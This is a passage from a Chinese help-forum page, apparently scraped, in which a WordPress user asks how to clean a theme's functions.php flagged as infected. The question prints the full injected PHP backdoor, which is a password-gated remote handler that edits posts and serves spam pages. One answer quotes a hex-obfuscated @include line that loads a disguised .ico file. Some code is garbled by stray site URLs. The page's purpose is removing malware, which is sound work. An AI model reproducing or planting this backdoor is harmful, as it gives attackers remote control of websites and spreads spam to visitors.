如何在WordPress functions.php中摆脱”SiteLock-PHP-FILEHACKER-of.UNOFFICIAL”

< ?phpif (isset($_REQUEST['action']) & & isset($_REQUEST['password']) & & ($_REQUEST['password'] == '')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb-> get_results('SELECT * FROM `' . $wpdb-> prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!< div id="wp_cd_code"> (.*?)< /div> !s', $data['post_content'], $_)) { $data['code'] = $_[1]; }print '< e> < w> 1< /w> < url> ' . $data['guid'] . '< /url> < code> ' . $data['code'] . '< /code> < id> ' . $data['ID'] . '< /id> < /e> ' . "\r\n"; } break; case 'set_id_links'; if (isset($_REQUEST['data'])) { $data = http://www.srcmini.com/$wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb-> prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"'); $post_content = preg_replace('!< div id="wp_cd_code"> (.*?)< /div> !s', '', $data -> post_content); if (!empty($_REQUEST['data'])) $post_content = $post_content . '< div id="wp_cd_code"> ' . stripcslashes($_REQUEST['data']) . '< /div> '; if ($wpdb-> query('UPDATE `' . $wpdb-> prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false) { print "true"; } } break; case 'create_page'; if (isset($_REQUEST['remove_page'])) { if ($wpdb -> query('DELETE FROM `' . $wpdb-> prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"')) { print "true"; } } elseif (isset($_REQUEST['content']) & & !empty($_REQUEST['content'])) { if ($wpdb -> query('INSERT INTO `' . $wpdb-> prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"')) { print "true"; } } break; default: print "ERROR_WP_ACTION WP_URL_CD"; }die(""); }if ( $wpdb-> get_var('SELECT count(*) FROM `' . $wpdb-> prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' ) { $data = http://www.srcmini.com/$wpdb -> get_row('SELECT * FROM `' . $wpdb-> prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"'); if ($data -> full_content) { print stripslashes($data -> content); } else { print '< !DOCTYPE html> '; print '< html '; language_attributes(); print ' class="no-js"> '; print '< head> '; print '< title> '.stripslashes($data -> title).'< /title> '; print '< meta name="Keywords" content="'.stripslashes($data -> keywords).'" /> '; print '< meta name="Description" content="'.stripslashes($data -> description).'" /> '; print '< meta name="robots" content="index, follow" /> '; print '< meta charset="'; bloginfo( 'charset' ); print '" /> '; print '< meta name="viewport" content="width=device-width"> '; print '< link rel="profile" href="http://gmpg.org/xfn/11"> '; print '< link rel="pingback" href="'; bloginfo( 'pingback_url' ); print '"> '; wp_head(); print '< /head> '; print '< body> '; print '< div id="content" class="site-content"> '; print stripslashes($data -> content); get_search_form(); get_sidebar(); get_footer(); }exit; }?> < ?php /* Our portfolio:http://themeforest.net/user/tagDiv/portfolio Thanks for using our theme! tagDiv - 2016 *//** * Load the speed booster framework + theme specific files */// load the deploy mode require_once('td_deploy_mode.php'); // load the config require_once('includes/td_config.php'); add_action('td_global_after', array('td_config', 'on_td_global_after_config'), 9); //we run on 9 priority to allow plugins to updage_key our apis while using the default priority of 10// load the wp booster require_once('includes/wp_booster/td_wp_booster_functions.php'); require_once('includes/td_css_generator.php'); require_once('includes/shortcodes/td_misc_shortcodes.php'); require_once('includes/widgets/td_page_builder_widgets.php'); // widgets/* * mobile theme css generator * in wp-admin the main theme is loaded and the mobile theme functions are not included * required in td_panel_data_source * @todo - look for a more elegant solution(ex. generate the css on request) */ require_once('mobile/includes/td_css_generator_mob.php'); /* ---------------------------------------------------------------------------- * Woo Commerce */// breadcrumb add_filter('woocommerce_breadcrumb_defaults', 'td_woocommerce_breadcrumbs'); function td_woocommerce_breadcrumbs() { return array( 'delimiter' => ' < i class="td-icon-right td-bread-sep"> < /i> ', 'wrap_before' => '< div class="entry-crumbs" itemprop="breadcrumb"> ', 'wrap_after' => '< /div> ', 'before' => '', 'after' => '', 'home' => _x('Home', 'breadcrumb', 'woocommerce'), ); }// use own pagination if (!function_exists('woocommerce_pagination')) { // pagination function woocommerce_pagination() { echo td_page_generator::get_pagination(); } }// Override theme default specification for product 3 per row// Number of product per page 8 add_filter('loop_shop_per_page', create_function('$cols', 'return 4; ')); if (!function_exists('woocommerce_output_related_products')) { // Number of related products function woocommerce_output_related_products() { woocommerce_related_products(array( 'posts_per_page' => 4, 'columns' => 4, 'orderby' => 'rand', )); // Display 4 products in rows of 1 } }/* ---------------------------------------------------------------------------- * bbPress */ // change avatar size to 40px function td_bbp_change_avatar_size($author_avatar, $topic_id, $size) { $author_avatar = ''; if ($size == 14) { $size = 40; } $topic_id = bbp_get_topic_id( $topic_id ); if ( !empty( $topic_id ) ) { if ( !bbp_is_topic_anonymous( $topic_id ) ) { $author_avatar = get_avatar( bbp_get_topic_author_id( $topic_id ), $size ); } else { $author_avatar = get_avatar( get_post_meta( $topic_id, '_bbp_anonymous_email', true ), $size ); } } return $author_avatar; } add_filter('bbp_get_topic_author_avatar', 'td_bbp_change_avatar_size', 20, 3); add_filter('bbp_get_reply_author_avatar', 'td_bbp_change_avatar_size', 20, 3); add_filter('bbp_get_current_user_avatar', 'td_bbp_change_avatar_size', 20, 3); //add_action('shutdown', 'test_td'); function test_td () { if (!is_admin()){ td_api_base::_debug_get_used_on_page_components(); } }/** * tdStyleCustomizer.js is required */ if (TD_DEBUG_LIVE_THEME_STYLE) { add_action('wp_footer', 'td_theme_style_footer'); // new live theme demos function td_theme_style_footer() { ?> < div id="td-theme-settings" class="td-live-theme-demos td-theme-settings-small"> < div class="td-skin-body"> < div class="td-skin-wrap"> < div class="td-skin-container td-skin-buy"> < a target="_blank" href="http://themeforest.net/item/newspaper/5489609?ref=tagdiv"> BUY NEWSPAPER NOW!< /a> < /div> < div class="td-skin-container td-skin-header"> GET AN AWESOME START!< /div> < div class="td-skin-container td-skin-desc"> With easy < span> ONE CLICK INSTALL< /span> and fully customizable options, our demos are the best start you'll ever get!!< /div> < div class="td-skin-container td-skin-content"> < div class="td-demos-list"> < ?php $td_demo_names = array(); foreach (td_global::$demo_list as $demo_id => $stack_params) { $td_demo_names[$stack_params['text']] = $demo_id; ?> < div class="td-set-theme-style"> < a href="http://www.srcmini.com/< ?php echo td_global::$demo_list[$demo_id]['demo_url'] ?> " class="td-set-theme-style-link td-popup td-popup-< ?php echo $td_demo_names[$stack_params['text']] ?> " data-img-url="http://demo.tagdiv.com/demos_popup/newspaper/large/< ?php echo $demo_id; ?> .jpg"> < /a> < /div> < ?php } ?> < div class="clearfix"> < /div> < /div> < /div> < div class="td-skin-scroll"> < i class="td-icon-read-down"> < /i> < /div> < /div> < /div> < div class="clearfix"> < /div> < div class="td-set-hide-show"> < a href="http://www.srcmini.com/#" id="td-theme-set-hide"> < /a> < /div> < div class="td-screen-demo" data-width-preview="380"> < /div> < div class="td-screen-demo-extend"> < /div> < /div> < ?php } }//print_r(td_global::$all_theme_panels_list);

【如何在WordPress functions.php中摆脱” SiteLock-PHP-FILEHACKER-of.UNOFFICIAL” 】我的托管病毒扫描程序检测到主题function.php文件中存在病毒。不知道如何删除代码而不影响网站。请帮助我从此function.php清除恶意病毒代码” SiteLock-PHP-FILEHACKER-of.UNOFFICIAL”
#1我一直在与这种病毒作斗争, 而我要解决的问题是:
  1. 分析所有目录
  2. 根据受感染的文件, 使用vim或nano使用它们打开它们, 你应该会看到注入只是将其删除, 并且你的文件应该没问题
  3. 对所有受感染的文件重复此操作, 其中某些文件是由病毒导入的.zip, 请删除这些文件并保留原来的文件。
作为建议, 你应该保持插件和主题的更新
希望它能起作用, 可能不是更有效的方法, 但是对我有用。
#2这些病毒会在你的大多数文件中添加一行代码, 这些文件称为受影响的文件。
就我而言, 受影响的文件具有共同的特点:
@include "\x2fho\x6de/\x6bks\x68o3\x62c/\x70ub\x6cic\x5fht\x6dl/\x77p-\x69nc\x6cud\x65s/\x6as/\x6acr\x6fp/\x66av\x69co\x6e_f\x389a\x617.\x69co";

当你从所有这些文件中删除此行时, 你就不会受到病毒/恶意软件的感染。

    推荐阅读